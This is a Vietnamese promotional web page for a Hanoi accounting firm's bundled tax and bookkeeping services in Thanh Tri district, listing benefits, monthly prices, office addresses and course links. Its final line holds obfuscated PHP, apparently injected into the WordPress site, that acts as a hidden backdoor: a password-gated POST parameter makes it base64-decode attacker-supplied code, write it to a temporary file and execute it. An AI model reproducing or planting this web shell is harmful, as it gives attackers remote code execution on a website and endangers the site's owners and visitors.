1

Dịch vụ kế toán thuế trọn gói tại Thanh Trì Hà Nội

HỌC KÈM RIÊNG KẾ TOÁN 1-1 xem ngay

LỚP HỌC KẾ TOÁN NỘI BỘ CẤP TỐC xem ngay

LỚP KẾ TOÁN CHO NGƯỜI MỚI BẮT ĐẦU xem ngay

KẾ TOÁN HÀ NỘI GROUP CHUYÊN LÀM DỊCH VỤ KẾ TOÁN GIÁ RẺ UY TÍN CHO DOANH NGHIỆP TẠI HÀ NỘI

 1. Doanh nghiệp bạn đang ở khu vực Thanh Trì và thuộc quyền quản lý của chi cục thuế Thanh Trì Hà Nội?
 2. Quý doanh nghiệp đang có nhu cầu thuê dịch vụ kế toán cho công ty mình??

Dịch vụ kế toán trọn gói tại Thanh Trì Hà Nội đáp ứng được mọi yêu cầu mà quý khách hàng đưa ra, chúng tôi mang đến dịch vụ khai báo thuế uy tín, chính xác và kịp thời ở mọi thời điểm mà khách hàng yêu cầu. Bên cạnh đó, khi sử dụng dịch vụ kế toán ở Thanh Trì của KẾ TOÁN HÀ NỘI , khách hàng sẽ được tiết kiệm khá nhiều chi phí cũng như mọi vấn đề liên quan đến cơ quan thuế đều được chúng tôi giải quyết nhanh chóng.
 

Lợi ích mang lại cho doanh nghiệp khi sử dụng dịch vụ kế toán tại Thanh Trì

 • Tiết kiệm chi phí: để thuê nhân viên kế toán thuế có trình độ để thực hiện những công việc trên, so với chi phí mà doanh nghiệp bỏ ra thì chi phí sử dụng dịch vụ của công ty chúng tôi luôn luôn thấp hơn nhiều lần. Chỉ bằng 1/4 lương tháng cho nhân viên kế toán nếu so sánh giá dịch vụ làm báo cáo thuế hay kế toán trọn gói.
 • Kế toán trưởng của chúng tôi có trên 10 năm kinh nghiệm: Kế toán trưởng đến trực tiếp doanh nghiệp để ký kết hợp đồng và đã làm dịch vụ làm kế toán thuế cho rất nhiều công ty.
 • KẾ TOÁN HÀ NỘI có đủ giấy phép hoạt động trong lĩnh vực kế toán thuế, là cầu nối giữa Doanh nghiệp với Chi cục thuế Thanh Trì; do vậy, DN có thể yên tâm khi sử dụng dịch vụ của KẾ TOÁN HÀ NỘI.
 • Với chi phí chỉ từ 500.000 đồng/tháng: Doanh nghiệp tại Thanh Trì không phải lo lắng đến bất kì một vấn đề gì liên quan đến kế toán và thuế để có thể hoàn toàn yên tâm phát triển kinh doanh.
 • Tùy vào quý doanh nghiệp yêu cầu chúng tôi có dịch vụ làm báo cáo thuế qua mạng/làm báo cáo thuế online hay tiếp nhận hồ sơ trực tiếp/gửi báo cáo trực tiếp đến Doanh nghiệp trước khi chuyển cho Chi cục thuế Thanh Trì.
 • Sẽ được kế toán trưởng bên chúng tôi gọi lại tư vấn chi tiết bảng giá dịch vụ kế toán tại Thanh Trì cho quý doanh nghiệp.
 • Quý doanh nghiệp sẽ có được dịch vụ báo cáo thuế hàng tháng chuyên nghiệp và chính xác chỉ từ 500.000đồng/tháng.
 • Khi quý doanh nghiệp sử dụng dịch vụ kế toán thuế trọn gói tại Thanh Trì, tất cả những khó khăn, tồn tại trên sẽ được giải quyết một cách nhanh chóng, triệt để của KẾ TOÁN HÀ NỘI .
 • Với những kế toán trưởng, chuyên viên, quản lý có trình độ, nhiều năm kinh nghiệm, công ty chúng tôi đã nhận được giải thưởng sản phẩm dịch vụ uy tín chất lượng do người tiêu dùng bình chọn, để áp dụng cho các công ty khách hàng chúng tôi làm việc chuyên nghiệp nắm bắt và cập nhật kịp thời các chính sách mới. Chúng tôi chịu mọi trách nhiệm trước pháp luật về công việc của mình.

Trách nhiệm của KẾ TOÁN HÀ NỘI chúng tôi

 • Trong quá trình làm việc, chúng tôi sẽ thay mặt công ty giải quyết tất cả những phát sinh, vướng mắc.
 • Khi cơ quan thuế đến kiểm tra sẽ có trách nhiệm giải trình trước cơ quan thuế.
 • Chúng tôi hoàn toàn chịu trách nhiệm, cam kết nộp phạt toàn bộ nếu làm sai.
 • Quý doanh nghiệp hoạt động tại Thanh Trì hay bất cứ tỉnh thành nào trên cả nước sẽ được chúng tôi đến tận nơi để ký kết hợp đồng.

KẾ TOÁN HÀ NỘI được tạo dựng lên bởi những chuyên gia kế toán thuế đã có nhiều bằng cấp và là công ty làm dịch vụ kế toán trọn gói tại Thanh Trì uy tín. Với nhiều chi nhánh ở khắp nơi trên toàn quốc , đặc biệt ở Hà Nội, đến nay KẾ TOÁN HÀ NỘI vẫn không ngừng lớn mạnh. 

Giá phí Dịch vụ kế toán trọn gói tại Thanh Trì:

 • Sẽ không còn là vấn đề lo lắng của Doanh nghiệp bạn nữa.
 • Chi phí Dịch vụ chỉ từ 500 -2 triệu/ tháng ( thay vì mức lương 8 – 10 triệu cho một Kế toán trưởng), Chúng tôi sẽ luôn cố gắng lại lợi ích tối đa cho Doanh nghiệp bạn.
 • Căn cứ theo quy mô, loại hình hoạt động, số hóa đơn chứng từ phát sinh trong tháng, doanh thu chi phí của DN…, chúng tôi sẽ có báo giá riêng!

K TOÁN HÀ NI – ĐI TÁC ĐNG HÀNH TIN CY CA DOANH NGHIP

Mọi chi tiết vui lòng liên hệKẾ TOÁN HÀ NỘI GROUP

PHÒNG DỊCH VỤ KẾ TOÁN TẠI THANH TRÌ HÀ NỘI

Hotline: 0973.761.751 – Mr Ngọc (Hỗ trợ 24/24)

Email : ketoan.vnpro@gmail.com

KẾ TOÁN HÀ NỘI GROUP – NƠI HỘI TỤ TINH HOA KẾ TOÁN

Quý Doanh Nghiệp có thể tham khảo thêm một số dịch vụ: 

VĂN PHÒNG TẠI HÀ NỘI

CS1: Lê Trọng Tấn – Thanh Xuân – Hà Nội.
CS2: Nguyễn Cơ Thạch – Từ Liêm – Hà Nội.
CS3: KĐT Sài Đồng – Long Biên – Hà Nội.
CS4: Quang Trung – Hà Đông – Hà Nội.
CS5: Minh Khai – Hoàng Mai – Hà Nội
CS6: Nguyễn Chí Thanh – Đống Đa – Hà Nội
CS7: Cổ Bi – Gia Lâm – Hà Nội

LỚP KẾ TOÁN NỘI BỘ ONLINE xem ngay

LỚP TIN HỌC VĂN PHÒNG CẤP TỐC xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

LỚP KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆP xem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Subscribe
  Notify of
  guest

  0 Comments
  Inline Feedbacks
  View all comments
  0
  Would love your thoughts, please comment.x
  ()
  x
  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}